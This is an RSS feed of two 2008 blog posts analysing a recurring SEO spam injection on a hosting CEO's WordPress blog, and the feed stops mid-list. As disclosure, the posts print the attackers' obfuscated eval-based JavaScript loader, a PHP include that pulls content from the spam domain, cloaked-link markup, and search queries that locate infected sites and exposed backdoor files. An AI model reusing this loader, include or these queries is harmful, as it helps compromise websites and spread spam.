<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; goro+spam</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/gorospam//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</title>
		<link>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/#comments</comments>
		<pubDate>Thu, 31 Jan 2008 17:07:22 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[Being Hacked by SEO spammer is like a yearly events at Mattheaton.com. Bluehost CEO WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at  &#8594; Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />Being Hacked by SEO spammer is seem like a yearly events at <span class="vcard"><a href="http://mattheaton.com" class="url fn microformat icn-r1">Mattheaton.com</a></span>. Matt&#8217;s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a>.</p>
<p>It&#8217;s a big embarrassment for <a rel="nofollow" class="exturl icn-r1" href="http://www.bluehost.com">bluehost</a> &#038; <a rel="nofollow" href="http://www.hostmonster.com" class="exturl icn-r1">hostmonster</a> hosting to have their CEO&#8217;s blog being spamride every year (since 2007) . Drilling Matt Heaton&#8217;s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.</p>
<p><span id="more-156"></span></p>
<h2 class="cb mgt">Mattheaton Goro Spam Chronology</h2>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td><small>Jul 2007</small></td>
<td> Google PR 7</td>
</tr>
<tr>
<td><small>Aug 2007</small></td>
<td> Stop being Index by <a rel="nofollow" class="exturl icn-r1" href="http://web.archive.org/web/*/http://www.mattheaton.com">archive.org</a></td>
</tr>
<tr>
<td><small>Nov 28th 2007</small></td>
<td> <strong class="fw-">Wordpress.net.in</strong> Goro Spam on wp_footer backlink to <a class="exturl icn-r1" href="http://www.howardowens.com/">howardowens.com</a></td>
</tr>
<tr>
<td><small>Dec 4th 2007</small></td>
<td>Unknown Goro Spam on wp_head backlink to <a href="http://tangonoticias.com/" class="exturl icn-r1">tangonoticias.com</a></td>
</tr>
<tr>
<td><small>Dec 11th 2007</small></td>
<td>Wordpress Upgrade to version 2.3.1</td>
</tr>
<tr>
<td><small>Jan 16th, 2008</small></td>
<td>Google PR5</td>
</tr>
<tr>
<td><small>Jan 26th, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.brainware-india.com/" rel="nofollow" class="exturl icn-r1">brainwave-india.com</a></td>
</tr>
<tr>
<td><small>Feb 3rd, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.thinkingphp.org/" rel="nofollow" class="exturl icn-r1">thinkingphp.org</a></td>
</tr>
<tr>
<td><small>Feb 8th, 2008</small></td>
<td>Unknown uusing CSS cloacking method on wp_head backlink to <a href="http://www.zoorender.com/" rel="nofollow" class="exturl icn-r1">zoorender.com</a></td>
</tr>
<tr>
<td><small>Feb 13th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a></td>
</tr>
<tr>
<td><small>Feb 20th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.entrepreneur27.org/" class="exturl icn-r1">entrepreneur27.org</a></td>
</tr>
<tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>Feb 24th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="www.latenightpc.com">latenightpc.com</a></td>
</tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>Feb 26th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.communitynext.com" class="exturl icn-r1" title="www.communitynext.com">communitynext.com</a></td>
</tr>
</tbody>
</table>
<h2 class="cb mgt mgb-">Wordpress.net.in GORO Spam Pattern</h2>
<ul class="xoxo exturl pdt">
<li>All the infected sites will stop being index by archive.org few months before the spam started.</li>
<li>From Nov 2007 to Jan 2008 (Right after Google Mass <abbr title="pay-per---post"> P3</abbr> De-rank fever) - The Blackhat Goro Spammer is targeting PR6 &#038; PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)</li>
<li>I categorize this blackhat method as <a href="http://en.wikipedia.org/wiki/Sybil_attack">Sybil Attack</a><br />
<blockquote cite="http://en.wikipedia.org/wiki/Reputation_system"><p class="quote">A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system&#8217;s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.</p>
</blockquote>
<p>- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) </li>
<li>Goro signatures:
<ol>
<li>html div with id &#8220;goro&#8221;
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt; &lt;a href=&quot;&gt;...&lt;/a&gt; &lt;/div&gt;
</pre>
</li>
<li>javascript function name &#8220;getme()&#8221;
<pre class="smallbox">&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;
</pre>
</li>
<li>Output spam on WordPress wp_footer &#038; wp_head hook</li>
</ol>
</ul>
<h2>Blackhat SEO Spamdexing Google Local Search Index</h2>
<p>The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.</p>
<h3 class="title-">View Spamdexing Google Local Search Image</h3>
<div id="spamdexing-google-local-search" class="dn">
<img src='/wp-content/uploads/2008/01/mattheaton-comeback.png' alt='spamdexing-google-localsearch.png' class="mgb ta-c" width="500" height="800" /></p>
<p class="notice cb mgt">Note: A blackhat at hoqwarts ;)</p>
</div>
<h2 class="cb mgb-">ScreenGrab</h2>
<ul class="xoxo pdt exturl">
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/mattheatoncom-jan-08.png' title='screenshot of mattheaton.com on january 2008' type="image/png" class="icn-">mattheaton.com Jan 28 2008</a> <small>(1009 x 6576 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/levitra-tagging-googlebot.png' title='brainwave-india hacked by goro' type="image/png" class="icn-">brainwave-india.com Jan 28 2008</a> <small>(1016 x 2306 pixels)</small></li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/localsearch.png' title='Spamdexing Google Localsearch' type="image/png" class="icn-">Google Local Search Jan 28 2008</a> Spamdexing Results</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra.png' title='stc-israel.org.il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (hidden text)</li>
<li><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/10mg-levitra-white.png' title='stc-israel.org il spamdexing google localsearch' type="image/png" class="icn-">stc-israel.org.il Jan 28 2008</a> spamdexing page (text reveal)</li>
</ul>
<h2 class="cb mgt mgb">Recent Update</h2>
<ul class="xoxo r">
<li><span class="fw">Feb 1, 2008</span> - we send a letter to <span class="vcard"><a href="mailto:matt@bluehost.com" class="url fn email microformat icn-l">matt@bluehost.com</a></span> regarding this issue. Still waiting for his replies</li>
<li><span class="fw">Feb 3, 2008</span> - The Blackhat Goro Spammer change their target spamhost from <a href="http://www.brainwave-india.com" class="exturl icn-r">http://www.brainwave-india.com</a> <small>(PR6)</small> to <a href="http://www.thinkingphp.org" class="exturl icn-r">http://www.thinkingphp.org</a> <small>(PR6)</small> - <span class="vcard"><a href="http://www.fg-webdesign.de/en/" class="url fn microformat icn-l">Felix Geisend&#246;rfer</a></span>.
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt;&lt;a href=&quot;http://www.thinkingphp.org/?read=796 ... prescription&lt;/a&gt;&lt;/div&gt;&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;</pre>
<p><strong>thinkingphp.org</strong> blog is running on <em>WordPress 2.3.2</em>. We send him email regarding the <strong class="fw-">Goro Spam hijack</strong>.
</li>
<li id="feb8"><span class="fw">Feb 8th 2008</span>, There is no signature of Goro spam (tag with id goro) on Matt&#8217;s blog the blackhat is now using <em>Inline CSS Position Overflow </em> to hide the spams links &darr; redirect to <a href="http://www.zoorender.com" class="exturl icn-r1">zoorender.com</a> <small>(PR6)</small>.
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.zoorender.com/?discount=1776&quot;&gt;buying .. &lt;/div&gt;
</pre>
</li>
<li id="feb13"><span class="fw">Feb 13th 2008</span>, Same methods as above (inline css cloacking) .
<ul>
<li>HTML Code shown to a Regular Browser &rarr; 32,246 characters</li>
<li>HTML Code shown to Google Bot &rarr; 34,646 characters</li>
</ul>
<p>redirect to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a> <small>(PR7)</small>.</p>
<pre class="smallbox">&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://blog.jensfranke.com/?read=606&quot;&gt;buy generic fi
</pre>
</li>
<li id="feb20"><span class="fw">Feb 20th 2008</span>, CSS Cloacking redirect to <a href="http://http://www.entrepreneur27.org/" class="exturl icn-r1">http://www.entrepreneur27.org/</a> <small>(PR6)</small>.
<pre class="smallbox">
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1591&quot;&gt;bad side effects of viagra&lt;/a&gt;&amp;nbsp;&lt;a href=&quot;http://www.entrepreneur27.org/?more=1592&quot;&gt; ...
&lt;/div&gt;
</pre>
<li id="feb-24-08"><span class="fw">Feb 24th 2008</span>, CSS Cloacking redirect to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="latenightpc.com">http://www.latenightpc.com</a> <small>(PR5)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>mattheaton-com-022408-source.txt</a></small></li>
<li id="feb-26-08"><span class="fw">Feb 26th 2008</span>, CSS Cloacking redirect to <a href="http://www.communitynext.com/" class="exturl icn-r1" title="www.communitynext.com">http://www.communitynext.com/</a> WordPress 2.3.3 <small>(PR6)</small>. <small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>mattheaton-com-022608-source.txt</a></small>
</li>
</ul>
<h2 class="mgt mgb-">Related Posts</h2>
<ul class="xoxo pdt exturl">
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed wordpress.net.in Spam Injection"> How to Removed wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a></li>
</ul>
<h2 class="cb mgt">External <span class="rgb-hblue">Links</span></h2>
<ul class="xoxo exturl">
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/d3d3Lm1hdHRoZWF0b24uY29t.curie,80,302" title="Bluehost and Hostmonster CEO Blog">Bluehost &#038; Hostmonster CEO&#8217;s Blog</a></li>
<li><a rel="robots-no-follow" href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" rel="external nofollow robots-nofollow" rev="nvd:cve2006-4743" class="curie" title="National Vulnerabilities Database CVE 2006-4743">National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities</a></li>
<li><a href="http://en.wikipedia.org/wiki/Spamdexing">Wikipedia &#8594; Spamdexing</a></li>
<li><a href="http://pseudo-flaw.net/log/20/more-random-wordpress-blogs-and-al-gore-owned-by-seo-spammers">pseudo-flaw - more random wordpress blogs owned by seo spammers</a>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</title>
		<link>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/#comments</comments>
		<pubDate>Sat, 01 Dec 2007 09:55:53 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[class-mail]]></category>

		<category><![CDATA[cloacking]]></category>

		<category><![CDATA[DoS+Vulnerability]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[mick+jagger]]></category>

		<category><![CDATA[milw0rm]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[RealTime+Streaming+Protocol]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[<img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" style="float:left;margin: 0pt 5px 1px 0pt;" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong><p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><span class="given-name">Matt</span> <span class="family-name">Heaton</span></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when  I  found bunch of spamsware link on <a rev="mattheaton:blog" href="http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p> Matt's is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page</p>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="notice mgb"><small>Dec 11 2007</small> - Matt Heaton Blog&#8217;s has been cleansed. ATM he&#8217;s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade. </p>
<p class="notice mgt mgb"><small>Jan 26th, 2008</small> - Seem like bluehost engineer did a bad job at cleaning, <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">the goro spam is back</a>. </p>
<p><img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" class="thumb- fl" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong>
<p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><strong class="given-name" style="font-weight:400">Matt</strong> <strong class="family-name" style="font-weight:400">Heaton</strong></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when I found bunch of spamsware link on <a rev="mattheaton:blog" href="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p stle="text-align:right" class="cb"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY5MTczNA.curie,80,302" rel="nofollow" rev="sharepic:mattheatonfooter"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004691734.png" class="fr" alt="mattheaton.com bluehost ceo hack wordpress footer" width="130" height="68" /></a></p>
<p> Matt&#8217;s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page.</p>
<h3 id="lookup-results" style="margin-top:36px">Lookup for howardowens.com</h3>
<p>The below diagram explained the lookup results for <a href="http://www.howardowens.com">howardowens.com</a>. <small>click on the image to enlarge.</small></p>
<p><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.png' title='lookup results for howardowens-com'><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.thumbnail.png' alt='lookup results for howardowens-com' /></a><br />
Surprisingly the <span style="text-decoration:line-through">spammer</span> website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).
</p>
<p><span id="more-44"></span></p>
<h2 id="tracking-summary" style="margin-top:18px; border-top: 1px solid #ccc; padding-top:18px" class="sumarry">
Tracking the spam sources.<br />
</h2>
<div class="description">
<p><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow" title="MattHeaton.com Blog Hacked Screenshot"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669853.png" alt="mattheaton.com hacked" width="15" height="130" class="fl" /></a>Viewing <span class="vcard"><a href="view-source:http://mattheaton.com" class="url fn org">mattheaton.com</a></span> html sources I found some hint and start searching for <tt style="background-color:#fff7c7;color:#333;padding:3px">xanax intext:id=\&#8221;goro\&#8221;</tt>. Google return <a href="http://www.google.com/search?q=xanax+intext%3Aid%3D%5C%22goro%5C%22" rel="external nofollow robots-nofollow" rev="google:result">2 results</a> for this query. </p>
<dl id="meta-search-results" class="google-query cb" style="line-height:1.6em">
<dt style="float:left;margin-right:3px;width:150px"><small>1.</small>&nbsp;Wordpress Support</dt>
<dd><a href="http://blog.kakkoi.net/uri/d29yZHByZXNzLm9yZy9zdXBwb3J0L3RvcGljLzEzOTQ1NQ.curie,80,302" rel="external" rev="wordpress:forum" title="php get footer adding spam code">php get footer adding spam code?</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:150px"><small>2.</small>&nbsp;elijahzarwan.net</dt>
<dd><a href="http://blog.kakkoi.net/uri/ZWxpamFoemFyd2FuLm5ldC9ibG9nLz9wPTQzMw.curie,80,302" rel="external nofollow robots-nofollow" class="curie" rev="elijahzarwan:entries" title="div id=&quot;goro&quot;"><strong style="font-weight:400">div id=”Goro”</strong></a> <small>(nice headline)</small>
</dl>
<p> Both site suggest same type of php injection methods<br />
<code lang="php"> include('http://wordpress.net.in/statcounter.php');</code>
</p>
<p>The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from <strong>http://wordpress.net.in/</strong>[random]/ random = 1 - 9.</p>
</div>
<h2 id="raw-whois" style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Raw whois for wordpress.net.in</h2>
<pre class="prebox">
Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM
</pre>
<p class="note" style="margin:10px;padding:10px;border:1px solid #eee">Note: The registrant address on <abbr title="1 red square, Moscow">1 red square</abbr> is a famous restaurant in Moscow.</p>
<p> Its pretty obvious that <tt>wordpress.net.in</tt> belong to registrar in India.</p>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Live example wordpress.net.in injection </h2>
<p> Google query for <tt style="background-color:#fff7c7;color:#444;padding:3px">warning &#8220;[function.include]&#8221; allintext: &#8220;wordpress.net.in&#8221; </tt> . Used <a href="http://blog.kakkoi.net/uri/d3d3LmZpZGRsZXJ0b29sLmNvbS9maWRkbGVyLw.curie,80,302" rel="nofollow external robots-nofollow" rev="fiddler:httpdump">fiddler</a> or any http-inspector to trace the full header request.
</p>
<dl id="meta-search-results-wordpress-net-in-inject" class="google-query" style="line-height:1.6em">
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>1</small>&nbsp;Evan Morris</dt>
<dd>Wordpress 2.0.6 | <a href="http://blog.kakkoi.net/uri/d3d3LndvcmQtZGV0ZWN0aXZlLmNvbS93b3JkcHJlc3MvP3A9MTIy.curie,80,302" rel="nofollow external robots-nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/wordpressnetin-goro-injection.png' title='wordpress.net.in goro injection'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>2</small>&nbsp;carwax</dt>
<dd>Wordpress 1.5.2 | <a href="http://blog.kakkoi.net/uri/YmxvZy5jYXJ3YXhwcm9kdWN0aW9ucy5jb20vP209MjAwNjAz.curie,80,302" rel="external nofollow" title="blog.carwaxproductions.com">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>3</small>&nbsp;aabenthus.biz</dt>
<dd>Wordpress 2.0.x | <a href="http://blog.kakkoi.net/uri/YWFiZW50aHVzLmJpeg.curie,80,302" rel="external nofollow robots-nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>4</small>&nbsp;mythinger.com</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:w5Sd6heMJL0J:johnboone.mythinger.com/+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=21&#038;gl=us&#038;client=firefox-a">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/johnboonemythingercom-wordpressnetin.png' title='johnboone.mythinger.com wordpress.net.in'>screenshot</a></dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>5</small>&nbsp;classicalanglican.net</dt>
<dd>Wordpress 2.0.2 | <a href="http://209.85.173.104/search?q=cache:fZb5-RNSGv0J:titusonenine.classicalanglican.net/%3Fp%3D13132+wordpress.net.in&#038;hl=en&#038;ct=clnk&#038;cd=22&#038;gl=us&#038;client=firefox-a" rel="external nofollow">url</a> | <a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/titusonenineclassicalanglicannet-wordpressnetin.png' title='titusonenine.classicalanglican.net wordpress.net.in'>screenshot</a>
</dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>6</small>&nbsp;echo9er.net</dt>
<dd>WordPress 1.5.1 | <a href="http://blog.kakkoi.net/uri/d3d3LmVjaG85ZXIubmV0L2Jsb2cvP3A9MjQwMA.curie,80,302" rel="external nofollow">url</a> | screenshot </dd>
<dt style="clear:left;float:left;margin-right:3px;width:160px"><small>7</small>&nbsp;boyarick.com</dt>
<dd> Wordpress 2.0.2 | <a href="http://blog.kakkoi.net/uri/Ym95YXJpY2suY29tL2Jsb2cvP3A9MTM2.curie,80,302" rel="nofollow external robots-nofollow">url</a> | screenshot</dd>
</dl>
<h2 style="clear:left;margin-top:18px; border-top: 1px solid #ccc; padding-top:18px">Google Directory search for class-mail.php</h2>
<p>Search for <strong>class-mail.php</strong> in open directory (public).<br />
<tt style="background:#fff7c7;color:#444;padding:3px">&#8220;parent directory&#8221; class-mail.php -html -htm –php -shtml -md5 -md5sums</tt></p>
<ul class="xoxo">
